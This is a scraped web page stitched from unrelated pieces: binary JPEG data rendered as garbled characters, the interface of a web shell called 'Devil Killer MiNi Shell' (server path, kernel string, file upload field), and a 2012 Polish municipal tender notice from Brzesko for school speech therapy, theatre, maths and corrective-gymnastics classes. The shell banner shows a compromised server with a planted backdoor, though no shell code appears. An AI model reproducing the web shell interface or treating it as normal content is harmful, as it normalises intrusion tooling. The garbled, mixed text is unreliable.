JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120910/194507-N-2012.html

<p class="kh_header"><b>Brzesko: Dodatkowy przetarg - Wykonanie usług edukacyjnych w ramach projektu -Złap szansę - wyrównywanie dysproporcji edukacyjnych oraz poprawa jakości kształcenia w ramach indywidualizacji nauczania w Szkołach Podstawowych 
w Gminie Brzesko</b><br>
<b>Numer ogłoszenia: 194507 - 2012; data zamieszczenia: 10.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Brzeska , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie, tel. 0-14 68 63 100, faks 0-14 66 305 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dodatkowy przetarg - Wykonanie usług edukacyjnych w ramach projektu -Złap szansę - wyrównywanie dysproporcji edukacyjnych oraz poprawa jakości kształcenia w ramach indywidualizacji nauczania w Szkołach Podstawowych 
w Gminie Brzesko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach projektu odbędą się zajęcia dodatkowe w trzech szkołach podstawowych Gminy Brzesko (wykaz załącznik Nr 8 SIWZ). Planuje się zorganizowanie następującego rodzaju zajęć, tj.:

- Zajęcia logopedyczne dla dzieci z zaburzeniami mowy - łącznie 270 godzin w 3 szkołach;

Zajęcia odbywać się będą od października 2012 do maja 2013 roku.

Szczegółowy opis Części zamówienia stanowią odpowiednio załączniki;
Dla zadania   1  - załącznik PSP - Brzesko 2 - 3.1.
Dla zadania   2  - załącznik PSP - Brzesko 2 - 3.2.
Dla zadania   3  - załącznik PSP - Brzesko 2 - 3.3.
Dla zadania   4  - załącznik PSP - Brzesko 2- 3.4.
Dla zadania   5  - załącznik PSP - Brzesko 3- 3.5.
Dla zadania   6  - załącznik PSP - Jasień - 3.6.
Dla zadania   7  - załącznik PSP - Poręba Spytkowska - 3.7.
Dla zadania   8  - załącznik PSP - Poręba Spytkowska - 3.8.
Dla zadania   9  - załącznik PSP - Poręba Spytkowska - 3.9.
Dla zadania 10  - załącznik PSP - Poręba Spytkowska - 3.10.
Dla zadania 11  - załącznik PSP - Poręba Spytkowska - 3.11.
Dla zadania 12  - załącznik PSP - Poręba Spytkowska - 3.12.
Dla zadania  13  - załącznik PSP - Brzesko 2 - 3.13..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Na podstawie art. 67 ust . 1 pkt 7 upup Zamawiający może udzielić w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających 
na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne 
z przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Badane będzie złożone oświadczenie.
Ocena polega m.in. na sprawdzeniu;
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Badane będzie złożone oświadczenie.
Ocena polega m.in. na sprawdzeniu;
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Badane będzie złożone oświadczenie.
Ocena polega m.in. na sprawdzeniu;
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Badane będzie złożone oświadczenie.
Ocena polega m.in. na sprawdzeniu;
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Badane będzie złożone oświadczenie.
Ocena polega m.in. na sprawdzeniu;
czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy wystawiony jest w okresie ustalonym przez prawo (nie później niż wskazano),czy zawiera informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmio?towym postępowaniu, czy kserokopia załączona przez wykonawców w miejsce oryginału została potwierdzona -za zgodność- przez osoby uprawnione lub posiadające pełnomocnictwa udzielone przez osoby uprawnione, czy złożony dokument jest kompletny,
Wynikiem przeprowadzenia przez zamawiającego powyższego badania jest wypełniony druk - ocena spełnienia warunków udziału w postępowaniu. Druk ten zawiera w swojej treści dla każdego z badanych dokumentów (metodą zero-jedynkową) oznaczenie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie w trybie art. 22 ustawy Pzp - załącznik Nr 1 SIWZ. 
2. Oświadczenie w trybie art. 24 ustawy Pzp - załącznik Nr 2A SIWZ. 
3. Oświadczenie uzupełniające w trybie art. 24ustawy Pzp - załącznik Nr 2B SIWZ.
4. Oświadczenie o akceptacji projektu umowy - załącznik Nr 4 SIWZ.
5. Oferta wg wzoru   -  załącznik NR 7 SIWZ.
6. Wykaz części zamówienia które wykonawca zamierza powierzyć podwykonawcom - załącznik NR 9 SIWZ .
7. Oświadczenie w sprawie posiadania uprawnień  - załącznik NR 11 SIWZ.
8. Pisemne zobowiązanie się do udostępnienia potencjału technicznego 
i osób zdolnych do wykonania zamówienia - załącznik NR 10 SIWZ- jeżeli dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzesko.pl menu: PRZETARGI / zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brzesku 
32-800 Brzesko ul. Głowackiego 51. pokój nr 9, 
fax 14 66 305 45 100 /telefon 14 68 63 100 wew. 156, 
zam_pub@brzesko.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2012 godzina 08:50, miejsce: Urząd Miejski w Brzesku 
32-800 Brzesko ul. Głowackiego 51. pokój nr 101 - Sekretariat Burmistrza Brzeska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadania współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach IX Priorytetu, Działania 9.1, Programu Operacyjnego Kapitał Ludzki (Nr umowy: UDA-POKL.09.01.02-12-121/11-00).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia logopedyczne z dziećmi ,u których występują wady wymowy oraz trudności w nauce czytania i pisania w PSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:       30  godzin po 45 minut w I semestrze  roku szkolnego  2012/2013 

-	Ilość grup: 1
 
-	Metody pracy: nauka poprzez działanie - zadania, ćwiczenia w formie gier i zabaw logopedyczno-edukacyjnych

-	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie z wadami wymowy

-	Ilość uczniów na zajęciach - grupa - 4 osoby.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia teatralne z dziećmi wykazującymi zdolności aktorskie oraz nieśmiałymi i o wycofanej postawie. Grupa I
w PSP - Brzesko 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:      30   godzin po 45 minut w I semestrze  roku szkolnego  2012/2013 

-	Ilość grup: 1
 
-	Metody pracy: asymilacji wiedzy, samodzielnego dochodzenia do wiedzy, eksponujące( impresja, ekspresja), praktycznego działania

-	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie uzdolnieni aktorsko oraz z cechami nieśmiałości i wycofania 

-	Ilość uczniów na zajęciach - grupa I - 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zajęcia teatralne z dziećmi wykazującymi zdolności aktorskie oraz nieśmiałymi i o wycofanej postawie. Grupa II w PSP - Brzesko 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:       60  godzin po 45 minut w I semestrze  roku szkolnego  2012/2013 

-	Ilość grup: 1  
 
-	Metody pracy: asymilacji wiedzy, samodzielnego dochodzenia do wiedzy, eksponujące( impresja, ekspresja), praktycznego działania

-	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie uzdolnieni aktorsko oraz z cechami nieśmiałości i wycofania 
-	Ilość uczniów na zajęciach   - grupa II - 5 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w PSP - Brzesko 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:       30  godzin po 45 minut w I semestrze  roku szkolnego  2012/2013, dwa razy w tygodniu.

-	Ilość grup: 1
 
-	Metody pracy:  zadaniowa, ćwiczenia


5.	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie ze specyficznymi trudnościami w nabywaniu umiejętności matematycznych - klasa 1.

-	Ilość uczniów na zajęciach -  8 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy w PSP - Brzesko 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji -  od października 2012 r. do maja 2013 r., ( o terminie realizacji - w I czy II półroczu roku szkolnego 2012/2013 decyduje nauczyciel) sześć grup, każda grupa realizuje 30 godzin po 60 minut, 
-	Ilość grup - 6 (jeden nauczyciel może realizować zajęcia ze wszystkimi grupami)
Typy grup w terapii logopedycznej:
/	Praca z dziećmi z zaburzonym szeregiem szumiącym głosek: sz, ż, cz, dż
/	Praca z dziećmi z zaburzonym szeregiem syczącym głosek: s, z, c, dz
/	Praca z dziećmi z zaburzonym szeregiem ciszącym głosek: ś, ż, ć, dż.
/	Praca z dziećmi z zaburzoną wymową głoski -r-.
/	Praca z dziećmi z zaburzoną mową bezdźwięczną.

-	Metody pracy w terapii logopedycznej: 
/	wykonywane są ćwiczenia usprawniające narządy artykulacyjne,
/	doskonalona jest sprawność aparatu oddechowego,
/	prowadzone są ćwiczenia słuchu
/	 prowadzone są ćwiczenia zmierzające do wywołania i utrwalania prawidłowej artykulacji głosek, 
/	wzbogacany jest zasób słownictwa biernego i czynnego dziecka,
/	kształtowana jest i doskonalona umiejętność wypowiadania się, 
/	wykorzystywane są metody tradycyjne oraz logopedyczne programy komputerowe i programy edukacyjne.

-	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie z zaburzeniami mowy 

-	Ilość uczniów na zajęciach - do 4 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Gimnastyka korekcyjna dla dzieci z wadami postawy w PSP - Jasień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:       60  godzin po 45 minut w I i II półroczu   roku szkolnego  2012/2013.

-	Ilość grup: 2

-	Metody pracy: 

/	naśladowcza ścisła,
/	zabawowo-naśladowcza,
/	zabawowa klasyczna,
/	bezpośredniej celowości ruchu.

5.	Formy pracy:
/	indywidualna,
/	grupowa,
/	zespołowa.

-	Wymagania niezbędne dla uczestników zajęć:
- uczniowie klas I - III z zaburzeniami w statyce ciała, zakwalifikowani przez pielęgniarkę   szkolną lub lekarza rodzinnego oraz nauczyciela wychowania fizycznego do udziału w zajęciach.

-	Ilość uczniów na zajęciach  - 2 grupy po 5 osób każda grupa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia z dziećmi wykazującymi specyficzne trudności w nauce czytania 
i pisania, w tym zagrożonych dysleksją.  Grupa IV w PSP - Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:  30 godzin w roku szkolnym 2012/2013 (październik 2012r. - kwiecień 2013 r.).
- Metody pracy: zadaniowa, ćwiczenia
-	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie ze specyficznymi trudnościami w nauce czytania i pisania.
-	Ilość uczniów na zajęciach - grupa IV - 8 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia dla uczniów wykazujących specyficzne trudności w nauce 
       czytania   i pisania,  w tym zagrożonych dysleksją. Grupa III w PSP - Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:       30  godzin  w roku szkolnym 2012/2013 (październik 2012r. - kwiecień 2013 r.).

-	Ilość grup: 1

-	Metody pracy: 
/	zadaniowa,
/	 ćwiczenia,
/	gry edukacyjne.

-	Formy pracy: indywidualna, grupowa, zbiorowa.

